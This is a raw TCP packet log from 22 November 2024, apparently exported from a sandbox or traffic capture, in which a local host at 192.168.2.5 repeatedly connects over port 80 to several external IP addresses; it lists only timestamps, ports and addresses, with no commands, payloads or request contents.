                                                                                                            Nov 22, 2024 07:55:47.946257114 CET4981180192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:48.309534073 CET4981180192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:49.379066944 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:49.498872042 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:49.498990059 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:49.538902044 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:49.658467054 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:49.658571005 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.646589994 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.646948099 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.646980047 CET8049817199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:50.647011042 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:50.647059917 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:51.043891907 CET4981780192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.062416077 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.182014942 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:52.182116032 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.190720081 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:52.310400009 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295386076 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295433044 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295471907 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:53.295625925 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:53.295625925 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:53.297792912 CET4982480192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:53.417272091 CET8049824199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:59.484168053 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:55:59.603960991 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:55:59.604059935 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:55:59.618520021 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:55:59.738006115 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.122010946 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:01.130518913 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.130652905 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:01.131331921 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.131408930 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:01.241627932 CET8049840146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:01.241739988 CET4984080192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.141469955 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.320950985 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:02.321049929 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.335922956 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:02.456599951 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:03.594099998 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:03.594203949 CET8049846146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:03.594271898 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:03.840811968 CET4984680192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:04.859210014 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:04.978837967 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:04.978984118 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:04.998981953 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:05.118870020 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:05.118915081 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:06.385685921 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:06.385793924 CET8049855146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:06.385986090 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:06.512615919 CET4985580192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.532397985 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.652004004 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:07.652082920 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.662118912 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:07.782016039 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:09.016925097 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:09.017031908 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:09.017085075 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:09.019701958 CET4986280192.168.2.5146.88.233.115
                                                                                                            Nov 22, 2024 07:56:09.139280081 CET8049862146.88.233.115192.168.2.5
                                                                                                            Nov 22, 2024 07:56:14.979163885 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:15.098839998 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:15.098948956 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:15.111445904 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:15.231199980 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:16.488099098 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:16.488171101 CET8049879194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:16.488387108 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:16.622097015 CET4987980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.640552998 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.760288000 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:17.760608912 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.774687052 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:17.895689011 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:19.223676920 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:19.224083900 CET8049885194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:19.224147081 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:19.278307915 CET4988580192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.305730104 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.425527096 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:20.425690889 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.439014912 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:20.558758020 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:20.559005022 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:21.825508118 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:21.825643063 CET8049891194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:21.825840950 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:21.950448036 CET4989180192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:22.969039917 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:23.088855982 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:23.089046001 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:23.102030039 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:23.221699953 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:24.521514893 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:24.521595955 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:24.521763086 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:24.524585962 CET4989980192.168.2.5194.85.61.76
                                                                                                            Nov 22, 2024 07:56:24.644253016 CET8049899194.85.61.76192.168.2.5
                                                                                                            Nov 22, 2024 07:56:30.652128935 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:30.771864891 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:30.772016048 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:30.787024021 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:30.906604052 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.293979883 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:32.406029940 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.406128883 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:32.406183958 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.406255960 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:32.413496971 CET804991847.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:32.413593054 CET4991880192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.312105894 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.432167053 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:33.433639050 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.447989941 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:33.567709923 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:34.950346947 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.040144920 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:35.040435076 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.040446043 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:35.040553093 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.070103884 CET804992447.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:35.070275068 CET4992480192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:35.976386070 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:36.096466064 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:36.096668959 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:36.111277103 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:36.230762005 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:36.230925083 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.622068882 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:37.679708958 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.679770947 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.679900885 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:37.679936886 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:37.741976976 CET804993047.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:37.742034912 CET4993080192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.640650988 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.760663033 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:38.760801077 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.770698071 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:38.890300989 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:40.298732042 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:40.298813105 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:40.298932076 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:40.301516056 CET4993780192.168.2.547.76.213.197
                                                                                                            Nov 22, 2024 07:56:40.421061993 CET804993747.76.213.197192.168.2.5
                                                                                                            Nov 22, 2024 07:56:46.083000898 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:46.202653885 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:46.202815056 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:46.216577053 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:46.336828947 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:47.361414909 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:47.361646891 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:47.731520891 CET4995680192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:47.851202965 CET8049956208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:48.751182079 CET4996380192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:48.870850086 CET8049963208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:48.870949030 CET4996380192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:48.885040045 CET4996380192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:49.004627943 CET8049963208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:50.387720108 CET4996380192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:50.472395897 CET8049963208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:50.472477913 CET4996380192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:50.472559929 CET8049963208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:50.472605944 CET4996380192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:50.507296085 CET8049963208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:51.407820940 CET4996880192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:51.527503967 CET8049968208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:51.527611971 CET4996880192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:51.547869921 CET4996880192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:51.667493105 CET8049968208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:51.667663097 CET8049968208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:52.733308077 CET8049968208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:52.733491898 CET4996880192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:53.059601068 CET4996880192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:53.179248095 CET8049968208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:54.078344107 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:54.198045015 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:54.198323011 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:54.212625027 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:54.332180023 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.263345003 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.263411999 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.263448000 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.263483047 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.263659000 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.308244944 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.308305025 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.308360100 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.308394909 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.308399916 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.308432102 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.308444023 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.308471918 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.308597088 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.383389950 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.384908915 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.385118961 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.464404106 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.464519024 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.464746952 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.468616962 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.468971968 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.469063044 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.477097988 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.477309942 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.477392912 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.485482931 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.485790968 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.485873938 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.509485960 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.509912014 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.510097980 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.513539076 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.513847113 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.513921022 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.521972895 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.522048950 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.522134066 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.530358076 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.530704021 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.530787945 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.538774967 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.539498091 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.539580107 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.547209978 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.547384024 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.547470093 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.555624962 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.602010012 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.602137089 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.602200985 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.606193066 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.606295109 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.608123064 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:56:56.608205080 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.608985901 CET4997580192.168.2.5208.91.197.27
                                                                                                            Nov 22, 2024 07:56:56.728513002 CET8049975208.91.197.27192.168.2.5
                                                                                                            Nov 22, 2024 07:57:02.371850014 CET4999480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:02.491569996 CET80499948.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:02.491905928 CET4999480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:02.505940914 CET4999480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:02.625546932 CET80499948.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:04.012665987 CET4999480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:04.115753889 CET80499948.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:04.115825891 CET4999480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:04.115869045 CET80499948.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:04.115937948 CET4999480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:04.132649899 CET80499948.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:04.132709980 CET4999480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:05.032635927 CET5000180192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:05.152270079 CET80500018.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:05.152705908 CET5000180192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:05.171899080 CET5000180192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:05.291451931 CET80500018.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:06.684561014 CET5000180192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:06.801637888 CET80500018.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:06.801713943 CET80500018.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:06.801840067 CET5000180192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:06.801907063 CET5000180192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:06.804092884 CET80500018.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:06.804167032 CET5000180192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:07.704435110 CET5000480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:07.825825930 CET80500048.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:07.826071024 CET5000480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:07.839998007 CET5000480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:07.959990978 CET80500048.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:07.960050106 CET80500048.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:09.356528044 CET5000480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:09.494505882 CET80500048.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:09.494566917 CET80500048.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:09.494596004 CET80500048.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:09.494837999 CET5000480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:09.494838953 CET5000480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:09.494838953 CET5000480192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:10.382211924 CET5000580192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:10.502245903 CET80500058.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:10.502640963 CET5000580192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:10.511018991 CET5000580192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:10.630611897 CET80500058.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:12.240935087 CET80500058.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:12.240986109 CET80500058.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:12.241240025 CET5000580192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:12.243947983 CET5000580192.168.2.58.210.114.150
                                                                                                            Nov 22, 2024 07:57:12.363596916 CET80500058.210.114.150192.168.2.5
                                                                                                            Nov 22, 2024 07:57:17.562948942 CET5000680192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:17.682557106 CET8050006172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:17.682801962 CET5000680192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:17.701783895 CET5000680192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:17.821422100 CET8050006172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:18.847464085 CET8050006172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:18.847489119 CET8050006172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:18.847604036 CET5000680192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:18.847660065 CET8050006172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:18.847791910 CET8050006172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:18.847855091 CET5000680192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:19.215856075 CET5000680192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:20.234031916 CET5000780192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:20.353907108 CET8050007172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:20.354029894 CET5000780192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:20.368664026 CET5000780192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:20.488280058 CET8050007172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:21.564651012 CET8050007172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:21.564688921 CET8050007172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:21.564718962 CET8050007172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:21.564754009 CET5000780192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:21.564846039 CET5000780192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:21.872179031 CET5000780192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:22.890986919 CET5000880192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:23.010763884 CET8050008172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:23.011101007 CET5000880192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:23.025753021 CET5000880192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:23.145442009 CET8050008172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:23.145462036 CET8050008172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:24.179091930 CET8050008172.67.209.48192.168.2.5
